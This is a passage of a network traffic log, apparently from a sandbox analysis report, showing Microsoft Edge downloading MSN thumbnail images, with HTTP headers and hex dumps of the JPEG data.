2024-11-09 01:47:37 UTC	8048	IN	Data Raw: 3e f7 2d 77 22 7b ef 78 2e 80 24 f7 8d 97 75 e9 11 2c 1a c6 a7 53 e9 a7 72 6a 3b 99 a5 fb f8 79 69 0f be ea 70 5d 2c 0c 8a 56 9e 3b c1 76 2f c2 07 e1 87 f4 f8 b2 6b fa 9f 80 8e c9 1a 2f 6f 42 23 a1 2d 38 ec 89 eb 1f 87 5b f9 13 09 6a 5a 51 fc d5 3d 88 46 0e 62 3c b3 84 bf 82 f8 8d 8a fb 5c ee 8c 10 9e db af 6c 31 2e fc 76 b1 1b 59 57 6e 6d ee f1 63 6d d0 e1 5f a1 6f 7a 38 23 3b 55 60 94 60 e2 62 f1 eb aa cc 53 18 af 35 6f 0b b4 10 a8 68 9f cb f2 d2 af 7e 03 a6 9d 9c 36 c2 d2 f7 bd c6 3a 54 4a 4f 19 77 7c df 70 ea 1c ec d3 c1 68 e9 25 4d d3 bb 4c cb 5b e3 e0 b4 6d 61 4e 16 db 92 df 56 96 64 aa d3 76 df cb 4f e9 5b c6 98 5e c9 6b df a4 93 6d b7 4e 2a 5e d7 b1 07 ab 6e ef d9 7b 99 dd 3f 97 bd e8 1b 6a e3 d7 b7 82 d0 49 9f 86 cc 37 6f 7b d8 dd da 38 6b 7b 11 Data Ascii: >-w"{x.$u,Srj;yip],V;v/k/oB#-8[jZQ=Fb<\l1.vYWnmcm_oz8#;U``bS5oh~6:TJOw\|ph%ML[maNVdvO[^kmN*^n{?jI7o{8k{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.7	53071	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	634	OUT	GET /tenant/amp/entityid/BB1msyCF.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:37 UTC	521	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Mon, 04 Nov 2024 16:27:54 GMT X-Datacenter: northeu X-ActivityId: 0c1f6157-3949-424c-907e-cccf87d6394b Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msyCF X-Source-Length: 131943 Content-Length: 131943 Cache-Control: public, max-age=52733 Expires: Sat, 09 Nov 2024 16:26:29 GMT Date: Sat, 09 Nov 2024 01:47:36 GMT Connection: close
2024-11-09 01:47:37 UTC	15863	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: 8d 84 d6 19 f7 08 b6 94 84 aa 46 20 64 30 e5 46 36 34 64 de ba 85 d0 a7 2d 99 fb 43 05 4b 1a 40 12 09 3c 39 b3 60 93 3a 68 29 24 52 36 d1 f6 84 a6 14 b3 96 ed bc f3 e0 eb 08 59 64 21 65 46 3e d8 01 3f 6d ae 0a b4 ad 70 b5 53 2a 90 00 65 2a fa 13 2a 06 a4 88 92 79 d6 93 c2 61 84 ab c6 ec f6 06 55 f7 ee 73 9e 83 18 8b 12 25 3a 0e f0 72 0d b6 ed 23 d4 52 b5 a4 8c 09 92 29 89 c8 4f 16 35 b4 95 a5 6a 4c a4 03 f8 7c d9 45 2a 28 81 95 49 25 52 67 90 19 73 69 be 3c 01 12 37 91 71 51 38 d0 7d 21 46 0d 49 12 63 73 68 20 69 03 d3 b6 01 20 9c c1 19 ec f2 da c3 4a 54 81 21 32 aa c2 cd 04 71 8c b9 93 c1 c0 a4 76 41 52 77 d4 66 77 63 e6 e6 91 76 14 bb 8a 82 45 c4 ec 99 3c 68 32 ae 4c 74 eb b9 a4 2a 15 8c d6 46 d9 e0 d3 66 cd a5 29 52 a2 52 64 18 1a 44 73 33 9c 3d a4 80 Data Ascii: F d0F64d-CK@<9`:h)$R6Yd!eF>?mpSeyaUs%:r#R)O5jL\|E(I%Rgsi<7qQ8}!FIcsh i JT!2qvARwfwcvE<h2Lt*Ff)RRdDs3=
2024-11-09 01:47:37 UTC	1968	IN	Data Raw: 1b e1 fc cb d6 58 00 6b a8 df 3e 7f 26 72 7f 51 bc 14 b5 03 55 c6 a9 13 1a 44 53 e4 e9 77 3a a0 d2 7b f8 70 1d a0 0e d1 2f 02 c7 ea 29 f4 d3 ea fd 46 6a 39 c0 90 f6 7a 75 6a b4 93 43 cb 27 a2 92 7b 0a a9 04 ba 87 41 69 2b 28 9e d0 00 91 b8 cf d9 b1 b1 10 87 6e 4f 9a 02 2f 9c e1 dc 34 51 08 7c e6 f9 a0 21 0f a1 b2 1f 43 43 20 e2 b5 04 24 a8 cd 36 54 9e 4d cf 2b ae 55 c4 59 ff 00 19 09 24 c1 51 c0 31 2b 92 41 67 99 ea 7a be 94 dc 50 28 5d d3 cd 54 dc 04 80 1e 5a ee f5 b7 4c 8b 82 ca 70 48 a4 0e 03 bc b5 9f 56 e9 29 b2 90 94 83 f5 1f bf da 4b 8f e4 55 9d cb de fc 48 7d 72 9c 62 6b 18 75 69 7d 58 cf 53 ac 23 41 ea 69 b4 67 e7 00 f8 b2 ed 7e 6a d9 d4 8e a4 93 b0 93 07 cc a8 30 07 4d d1 83 07 a8 ff 00 52 7e cc e4 f4 5d 39 fa 7a 88 e2 83 f3 0e 3e 62 f7 46 ea 0b Data Ascii: Xk>&rQUDSw:{p/)Fj9zujC'{Ai+(nO/4Q\|!CC $6TM+UY$Q1+AgzP(]TZLpHV)KUH}rbkui}XS#Aig~j0MR~]9z>bF
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: 3a ed 99 c0 ec d9 30 f0 d2 9f 37 e4 01 f7 6f ad 33 a2 e2 4f ed 05 3b 06 da 49 c5 f9 db b7 55 1a 54 6a a8 26 3e 12 79 7c d9 eb b6 17 01 37 50 23 15 83 3e 61 d2 ad 5d 44 9b 96 f5 85 7c 69 32 39 c2 66 bb de d1 d3 1e 97 e8 c8 69 9e 7b 0c 4e e8 0d c9 b7 89 a7 be cc 78 33 f4 80 63 54 11 81 83 1e 7f 36 eb 76 6e d7 4a 24 2b e3 51 20 7f 0e 7e 0f a3 51 9d 19 4b 54 01 45 2b 60 a8 4c 6d 8c cb 60 4a 7e 28 9c 53 94 6e c5 ee dc b0 a1 1a 8a 13 ab 7e ad 98 81 df 56 09 42 50 47 f9 ce 98 83 d9 26 b3 84 d7 c1 ca 92 65 69 7d 0a 16 82 23 b3 04 d7 51 23 b8 e5 39 66 c7 32 12 4c a4 73 51 cf 61 a9 2e 93 79 12 90 6b 2a 33 33 99 dd 40 7e 6e ee 20 18 82 73 56 7f 6d fc 72 6c 42 35 29 52 01 39 52 29 58 ae f8 64 f4 ca 36 ee 42 89 92 37 8f 1d 83 7c bc e2 7d 38 cc 1d b9 4f 9b db e9 ee 64 Data Ascii: :07o3O;IUTj&>y\|7P#>a]D\|i29fi{Nx3cT6vnJ$+Q ~QKTE+`Lm`J~(Sn~VBPG&ei}#Q#9f2LsQa.yk*33@~n sVmrlB5)R9R)Xd6B7\|}8Od
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: 14 07 f7 52 76 0a 12 7c df a3 e8 2f 21 20 85 aa da 7b 55 49 30 40 23 34 d0 c4 41 ac bf 0e 01 d3 53 3b a6 83 07 a3 67 a7 50 04 cc ea c4 c4 0e 06 6a f3 9c a9 02 3d 77 5e b0 ab 5d 2e 82 16 74 99 12 09 c9 39 bf 3a 24 1a 98 3b 23 2f 1c f7 32 54 ab 76 e8 a5 00 7b f8 06 04 dd 27 b2 9b 6a 1f cd 52 39 cb e7 f9 8e b6 4b df 89 a6 95 e2 1e 14 41 05 06 53 8e a3 2a 23 65 3e cc b2 a4 03 5a 03 84 cf 7b f3 b7 12 11 1a 53 07 3f aa 9c a3 bd 87 db 24 82 48 31 13 bd e4 d3 9a bd 54 55 d7 23 d2 2d 08 35 48 41 1c 52 47 38 a3 97 f9 12 04 29 48 fe d3 db 1c 0d 7b 9e 11 ba a4 24 e9 4c 98 cd ad 17 16 10 34 92 15 15 26 b9 d6 03 20 a7 1d dd ad b2 2c 1b c4 dc a4 c7 30 40 ff 00 4d 19 c6 14 91 20 a3 94 cf 98 1e 52 c2 49 0b 01 41 4b 82 27 31 f3 87 28 19 8d 47 f8 c4 f8 2d f5 61 93 b1 b0 17 Data Ascii: Rv\|/! {UI0@#4AS;gPj=w^].t9:$;#/2Tv{'jR9KAS*#e>Z{S?$H1TU#-5HARG8)H{$L4& ,0@M RIAK'1(G-a
2024-11-09 01:47:37 UTC	7952	IN	Data Raw: 8c 9c ea 95 46 dd b8 34 c6 22 a9 39 b1 e4 fc d9 f0 93 49 ab 4a ad 71 e7 1d ee 6d 14 0c 0a 71 c5 99 6c 15 52 32 c2 3c 5c 74 a7 f6 99 dc 59 f6 af a5 39 ca 4f 8b ca 6d d6 11 4b 88 d4 1d 03 2f e1 39 73 13 8f 26 f5 91 70 04 a8 10 45 52 6b 07 6e 5e 0d 42 e2 29 da 0a 13 94 7e 0f b4 a0 a8 fa 6b 8f ed 54 d7 70 9a 1f 78 7c 7c f9 ae 27 4a 78 a0 12 a5 db 5a 4a a1 43 03 8d 69 51 8f 17 a9 d1 ae fe a2 92 46 e3 8a a7 61 70 8b 6b 4c 41 41 34 38 0a 7c 3b b6 e4 dc b4 fa 5a 4e 93 a2 45 49 93 4a 50 cb bd 5c 15 8f 4f 5d 86 c2 d0 48 55 76 7b 86 40 13 8e 9e 25 d2 2f 25 5a 6d c8 13 f4 56 87 97 3d 92 e5 2a 06 a8 03 ff 00 51 23 bd e8 a5 ab 83 39 dc 5a 78 c8 40 49 83 0b 23 7e 7c 2a f8 22 95 51 57 30 3d c3 b4 28 1a 65 8f d6 83 3f ea 0e 5a ce 7a 6d e9 db a8 13 fe d4 3c 5d 94 84 94 61 Data Ascii: F4"9IJqmqlR2<\tY9OmK/9s&pERkn^B)~kTpx\|\|'JxZJCiQFapkLAA48\|;ZNEIJP\O]HUv{@%/%ZmV=Q#9Zx@I#~\|"QW0=(e?Zzm<]a
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: d5 cd 61 35 1a 88 92 90 2b bf 2a 39 cb 5b ba 1d f0 0e eb ae 5b 28 d4 0a 89 06 00 d2 00 f0 98 f2 79 29 be 85 24 a4 85 02 33 8c b6 98 a1 c3 37 7d 55 d2 94 47 ee 38 ec db 57 88 56 b2 20 82 a8 20 1e 5c 0b a4 9d 09 9e 81 37 6c d9 fa 46 a5 18 00 ea 27 85 00 6d 55 c3 73 13 ca 68 07 0d 9b de 28 d1 9d 6b 58 93 00 ee 34 74 9b a9 ce 23 31 cc cb 56 fa 36 20 cb 97 14 92 21 47 bd aa dd d5 15 09 3b 7c 7c db cf a7 42 a4 a8 d3 68 ae df 63 bf cc a2 dd 12 80 37 40 1e 79 97 b6 a8 d6 d6 2a e2 44 ad 49 4a 64 1a c9 33 b8 e0 e5 6e ee 90 4e dd a7 2e 4d 17 2e ea 01 54 93 41 8f 96 c6 ad 29 d2 0e a0 27 c2 1b 4e 2d 67 02 63 2e df 59 a6 a8 1b bb 8b d1 e9 08 16 cc c6 67 1f b0 9f 17 87 ea 00 0d 72 1b 1a 2d de 83 a6 84 01 b3 66 34 dc c7 95 49 07 3b 36 6e 75 0a 04 46 fc 4c 89 c3 c9 90 8b Data Ascii: a5+9[[(y)$37}UG8WV \7lF'mUsh(kX4t#1V6 !G;\|\|Bhc7@yDIJd3nN.M.TA)'N-gc.Ygr-f4I;6nuFL
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: 71 52 4c 48 49 29 c1 d2 94 55 41 90 48 8f c1 e7 b9 42 4a 84 e2 07 9b b6 81 38 89 c7 9b 66 15 0e 80 78 e7 3b b2 6c c2 47 93 52 54 98 c9 c8 94 8a 81 43 8b cc 09 0d be 02 9e 45 ae 46 d8 8c 47 cd ac 95 53 38 3c 5c 44 9c 6a dd 0c 74 8e 6e 68 ce 30 63 12 46 79 ee 75 aa 4b 28 03 0a 13 32 33 d8 e3 0a 06 94 db 3d ce 27 30 73 f7 e4 fb 54 97 34 05 98 19 2a ae 60 1c 61 a8 03 95 3c 9d c2 85 63 26 c6 71 80 7e 6e 52 d7 ae 43 8c b7 42 0e 42 a0 e6 de a0 15 cc 7b e4 c0 06 5b c2 88 34 97 35 90 23 e9 94 55 ac a7 63 2b 23 4f 7d cd 6b e5 9f bc 36 98 10 49 36 d4 14 92 64 78 37 7a ab 22 0a 89 00 ea 01 89 57 34 98 ee 74 d0 59 ea 6d df 55 d4 05 64 64 cc 08 a0 c0 61 bf 6b 70 57 4e 91 f4 9c aa 75 56 77 f6 bc 1e 05 b5 a9 16 a9 31 ac 19 c1 92 56 9b 97 92 8f 85 58 e5 5f b3 cd 60 b2 2b Data Ascii: qRLHI)UAHBJ8fx;lGRTCEFGS8<\Djtnh0cFyuK(23='0sT4*`a<c&q~nRCBB{[45#Uc+#O}k6I6dx7z"W4tYmUddakpWNuVw1VX_`+
2024-11-09 01:47:37 UTC	7952	IN	Data Raw: 54 59 24 27 4d b8 a4 04 d7 e6 03 09 5f a9 5c 51 85 5c 57 70 3b b3 63 e8 b2 9a 90 0f 3d 55 f2 76 2e db 98 09 a6 c2 91 1e 66 1a 5d be df 2e dd fb f1 b0 b9 3e 64 0d e0 aa a4 a8 ce d5 4d 7b df 24 f5 0a 3f 4a 8e d8 fa 48 df 25 e9 a4 53 b2 84 c6 d0 a1 a7 b9 5e 0d fa 16 71 03 70 9a 71 a3 3e 62 8f 28 af 1f e8 54 c4 7e 62 fd b4 56 e1 48 03 e8 4a 8c c7 21 40 f2 55 d6 6a 9d 4a 52 e7 e1 a9 3f d5 5f 93 d4 36 8e a9 5a b0 c2 9e 0a 9f 36 15 cf cb 83 a7 44 2b 31 04 ed 64 34 5f e5 b7 bd a4 86 ef a9 99 74 a9 30 53 49 dc 08 31 94 e7 5c 4c b0 ca c9 8e c0 9c 49 18 f0 c9 ec 84 ea 10 91 3f dc 0e 52 36 38 9e 98 a6 b0 39 e3 c6 68 5f 5a 9c 56 1e e6 54 62 6b bc 0e 66 3c 1c 00 ba b5 13 52 66 a4 d7 3c ab 83 d8 2b 13 92 60 91 59 15 dd 88 cf 6b 52 ae 50 e9 ec a8 13 31 5e 53 ec 7a ea ff Data Ascii: TY$'M_\Q\Wp;c=Uv.f].>dM{$?JH%S^qpq>b(T~bVHJ!@UjJR?_6Z6D+1d4_t0SI1\LI?R689h_ZVTbkf<Rf<+`YkRP1^Sz
2024-11-09 01:47:37 UTC	16288	IN	Data Raw: 02 89 1d ef 0d 2e f0 00 e6 c5 d4 d0 8c f7 87 c9 46 c8 d9 1f 3d 8d be b2 ee 11 5a 52 06 19 32 ca 8a 4d 53 98 26 45 7c e1 eb a9 ad e8 00 0d b2 7e 9a 56 22 73 e5 ed 71 28 52 7e 20 63 30 2b 1c 59 02 e9 51 09 a0 c2 7d c5 1d 69 52 0a ab 22 0d 46 3c c3 76 f9 88 08 ce d7 23 50 30 f7 c5 cd 48 cc 8a ee c6 18 a6 b8 47 37 a8 12 21 2f 86 ac 1d 4f 1f 7d ce 24 b6 01 12 b0 76 53 df 6b b9 48 ce a4 ec fb e0 f8 2f 0d dc 8b 44 0c 48 68 0a cc e2 e4 01 06 32 e6 d9 0a 02 82 9b dc 90 89 35 ec f3 60 0d 4e 9d 24 c5 71 cf 63 1d 24 ea 3c 99 8b 54 76 45 1c 52 35 6e cc 63 83 81 85 db 29 89 56 c1 1e c6 a3 7b 3e c8 8c a5 b5 48 ec a4 26 b2 04 9e fc b6 31 08 19 04 9a 52 38 d4 d6 5c 2a 63 22 2e 95 28 19 8f 7d c1 b0 e9 09 a9 ac e5 53 ab 63 a8 4a 6a 47 0c a8 da 02 94 0e 91 25 55 93 1e 5b 9d Data Ascii: .F=ZR2MS&E\|~V"sq(R~ c0+YQ}iR"F<v#P0HG7!/O}$vSkH/DHh25`N$qc$<TvER5nc)V{>H&1R8\*c".(}ScJjG%U[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.7	53072	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	634	OUT	GET /tenant/amp/entityid/BB1msMCf.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:37 UTC	521	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msMCf Last-Modified: Sun, 03 Nov 2024 23:45:58 GMT X-Source-Length: 121899 X-Datacenter: eastus X-ActivityId: bc7f5ac2-55df-4ee1-9ba9-e12b5d2b99e1 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 121899 Cache-Control: public, max-age=381384 Expires: Wed, 13 Nov 2024 11:44:00 GMT Date: Sat, 09 Nov 2024 01:47:36 GMT Connection: close
2024-11-09 01:47:37 UTC	15863	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: df 9d d0 80 00 c3 8c 5a 4c 09 20 e8 2e 47 8a 2e 3a dd ff 00 43 8d ce 6b 60 38 b6 43 64 ed 2e 83 0e 3f 44 22 44 f4 9d 37 fa a9 d8 17 1e 12 e6 b9 e4 1a 58 44 b8 00 4c 9d 9a 01 23 7d e5 0c d4 44 13 69 d8 fe 6c 8e 09 7d cb cb 89 30 d2 6c 01 8e ee e7 78 01 d5 67 32 5d 7d 0d c4 c1 f9 a5 c0 b2 fa 83 44 83 a0 1b fc 92 5f ae e5 41 91 f8 c9 73 09 6c cb 65 b2 0c 1d c4 f0 de e9 4b fb 6c 0f 23 f9 b9 5c 6d 6d 5c d7 34 d2 e0 41 1b ca 70 f7 b0 16 b0 c0 20 87 10 62 a0 77 06 f7 1c b6 41 26 a8 b4 01 61 16 9e 3d 57 6d fd 39 a8 ae 76 23 40 c8 66 ee 2d da 04 8b f5 93 6d ed 64 5c 98 ce 13 0f 69 15 30 39 ba 18 3b 18 df 84 a1 86 3b 78 88 fc ba 9f 10 27 59 51 49 49 1b da 44 f4 b2 23 45 8c ef a5 b7 5d dc 21 d7 e4 4f 2e 3d 13 12 f7 b9 ef 74 bc ee e3 3a 9e 7a 99 41 01 83 62 47 0d d7 Data Ascii: ZL .G.:Ck`8Cd.?D"D7XDL#}Dil}0lxg2]}D_AsleKl#\mm\4Ap bwA&a=Wm9v#@f-md\i09;;x'YQIID#E]!O.=t:zAbG
2024-11-09 01:47:37 UTC	2116	IN	Data Raw: a2 a3 78 1e 28 20 6f f9 f7 54 11 c6 b7 00 d6 35 b6 0d 86 c9 9e 72 e2 6e 75 88 40 d8 47 f0 88 0d a2 2f f3 e0 a6 c7 69 d7 54 03 85 13 a6 14 81 3d c5 da 58 53 1c f7 27 84 28 16 ab 44 0d e6 75 e1 d2 3c 12 ab ba b3 13 66 99 1b 99 b5 f4 be fc 65 02 ca 66 b1 f9 26 96 b9 d0 0b 8c 02 60 0d c9 8d 06 a5 22 38 ca e6 e3 a5 a5 cd dc 12 1c 60 b4 c7 6c 74 eb d5 69 92 63 7b f1 b8 3d 8e a5 cd b8 23 71 c1 47 10 46 d2 e9 24 ba 77 e5 1f 7d 52 ea ac db 44 0a 09 00 89 37 dc 68 54 56 14 28 28 13 b6 9c b6 1d 55 0d 27 f6 93 bc 78 7f 09 51 03 8c 58 91 62 0d e3 7d 10 40 40 69 11 73 af 4e 4b af c1 39 7b 68 68 a0 02 26 5d 2e 97 74 91 30 23 90 4a 5d 22 f2 4c eb b7 f3 2a 8e 91 4c 5b 7e 97 f3 48 55 56 25 44 25 e3 91 4a 8a 40 d2 76 bc f5 f3 28 68 8b 68 d6 67 7d 23 eb 2a 6a 99 a0 cd 81 3e Data Ascii: x( oT5rnu@G/iT=XS'(Du<fef&`"8`ltic{=#qGF$w}RD7hTV((U'xQXb}@@isNK9{hh&].t0#J]"LL[~HUV%D%J@v(hhg}#j>
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: b7 e6 6b 83 da f8 38 aa f8 64 cc 69 f1 38 c9 1c f6 5e 63 b7 89 0a 39 57 6f 02 6d f2 1c d1 4b 5a d0 21 d5 12 76 17 11 fc f2 59 c4 02 8d ee 9a 69 16 1a 01 c7 ac 4a 20 e5 94 10 26 4e a0 4f 6f 23 20 5c 6a b7 10 c1 8d 94 82 5c 66 b2 60 8d ec 1a 0b 44 1e a6 4c af 2d ae 8e 32 bd 0c 6e 6d 19 1e fc 90 47 c0 da 6a a8 cd c4 cf 6c 0b cc 19 d9 1b 83 07 b4 c8 71 23 b6 04 0b 4c eb f7 d5 73 5a d6 87 02 e8 74 c1 6d f6 8d f6 8f 0d f9 2c 43 2d f6 04 73 4d 5d 46 4d 93 55 ad f8 5a 60 97 38 5f b8 00 24 0e a2 4a ca 1d 92 0e 3a dc 1a 6c 44 c0 31 b4 e8 7c 56 96 39 e5 b5 bb b9 a4 d3 b8 a8 98 f1 36 d5 2b c0 04 12 59 b8 d9 c0 b8 cd fe 16 93 b6 a8 b5 5d e9 63 06 37 0f 51 ee 17 55 ee 63 01 c0 62 83 60 5c 6c e2 ed e1 bb 59 60 cb 88 e3 34 92 0f 02 08 f3 0b d8 f5 79 19 88 9c 78 9e 72 36 Data Ascii: k8di8^c9WomKZ!vYiJ &NOo# \j\f`DL-2nmGjlq#LsZtm,C-sM]FMUZ`8_$J:lD1\|V96+Y]c7QUcb`\lY`4yxr6
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: d8 c8 4d 10 22 97 07 13 b9 da 39 36 27 c6 52 92 37 8d fa 59 71 f1 b8 d7 54 56 96 b3 4f 1f c0 9c 35 cd bc 11 06 26 35 1a 5f e6 b4 35 e7 29 27 33 9c 4d 36 71 bb ac 21 ad 12 76 fa 0d 93 bf 0b 5a da c5 c1 30 38 f9 e8 8e 98 ce ee f7 13 2d bd c8 b0 1e 11 03 80 08 3b 18 9f e8 b4 b4 4f 86 d6 98 41 c9 2e 93 79 e7 af 9e e8 ce 35 8c e3 d8 f6 e8 61 35 54 5d 48 aa da 03 b8 1d 42 01 f8 e5 8e 3c 44 b7 4b f3 51 9d b1 04 4c eb 79 f0 da 38 aa 41 6c fe 4f 96 88 a0 e4 75 44 e9 c8 4c 0f 35 2a 90 6d 33 17 e9 e1 f7 55 db 0b 83 37 b6 9c 8d be 8b 89 60 63 62 6a bc ec 00 bd a3 52 7a a3 24 8b 13 d3 f3 75 d2 d0 6e 1d 71 c2 fe 5b 24 05 11 c6 bb 80 1a 3a 6f e2 51 03 21 d4 d5 06 92 62 a8 b1 23 49 eb c9 2a 69 b4 13 c2 f6 1c 02 3e 1c 85 8f 30 d6 bd ce 69 68 a9 81 c2 fa 80 76 20 6c 74 40 Data Ascii: M"96'R7YqTVO5&5_5)'3M6q!vZ08-;OA.y5a5T]HB<DKQLy8AlOuDL5m3U7`cbjRz$unq[$:oQ!b#Ii>0ihv lt@
2024-11-09 01:47:37 UTC	7952	IN	Data Raw: 28 00 74 3f 25 42 9c 79 28 39 29 34 82 1a 5d 16 93 a7 14 ed c6 48 9d a4 5b 9d d4 f0 5a ce 62 f7 55 43 45 80 80 d0 1b 61 1b 0d 79 aa 84 71 cd 9b 23 1a e7 17 91 4b 1b 51 98 03 66 89 26 00 f2 45 ce c7 07 90 e0 da 9a 4b 49 6d e4 8d 6c 48 f2 b2 40 03 49 91 28 ae 89 14 be b9 00 9e da 40 3a 8b ef 1d 42 a3 3b d8 45 ad d6 c8 37 ba dc 0c 1a 7b 4b 48 e8 7c f5 33 e0 b3 90 06 a3 f3 c1 10 a1 ee 6e 32 cb 43 e0 9b 34 9b 6d 78 91 e0 6e 84 0f 1e 7d 11 5a e6 b6 aa 9b 55 a1 a6 62 93 d7 9f 04 b2 0f 2e a8 12 e3 ea 8a 31 bc e2 76 46 83 4b 69 0f 33 69 76 df 45 29 b3 6e 20 ce a2 44 75 13 e5 2a 36 1a f6 d7 25 92 2a 00 c1 2d 9b c6 93 1b 2a 84 96 de 6d d1 74 01 f0 9d 86 eb 53 fd bc 3e a5 f3 88 86 43 a8 66 50 49 0d 70 ec 9a 4b 6f 04 19 db 92 c6 5c ce da 41 10 05 44 99 93 af 4b 7e 4a Data Ascii: (t?%By(9)4]H[ZbUCEayq#KQf&EKImlH@I(@:B;E7{KH\|3n2C4mxn}ZUb.1vFKi3ivE)n Du6%-*mtS>CfPIpKo\ADK~J
2024-11-09 01:47:38 UTC	16384	IN	Data Raw: 21 f6 31 ca 3a ae 73 8c 9d cf 5f f0 89 97 d3 c3 71 e4 f7 1a e0 f0 49 0d 32 e6 41 8e f1 16 94 c1 8d 17 d3 f3 55 94 64 74 88 75 cc fc 96 cc 0c 93 2e e9 37 50 86 b9 8e ee 13 22 d0 6a ff 00 da 76 03 94 a3 61 6c b9 b2 ee 80 55 b2 2e 72 f4 9d b7 d8 2c b9 46 68 fd 23 41 13 28 d8 b2 07 e7 32 e1 db 60 34 31 d3 69 5a 33 1b 99 12 0f c9 1b f2 f1 5b e9 5a 1b 37 9b f8 78 ac ee c2 29 70 2d 0f 92 03 5f 26 dd 6d 61 e2 57 b0 33 b5 8d 21 ae 22 a1 04 4e e3 a1 e4 b3 b5 ae 32 6c 07 2d 15 63 d6 3e 6f 2e 00 c7 75 e1 b2 76 e1 14 87 73 db 82 f6 1d e9 e4 c8 16 3e 69 dd e9 f3 60 ee 0d 61 11 37 83 31 ba ae 57 a3 97 99 1d c1 d6 dc 18 bc 0e 5f 85 7d 00 69 ce 2b 16 e4 0d 84 71 fb 95 e6 0c 98 9a c1 ff 00 33 51 99 25 fd be 00 34 6b cc af 42 8c b8 83 1c 71 f6 bc 40 aa 5a de e1 63 a5 f5 46 Data Ascii: 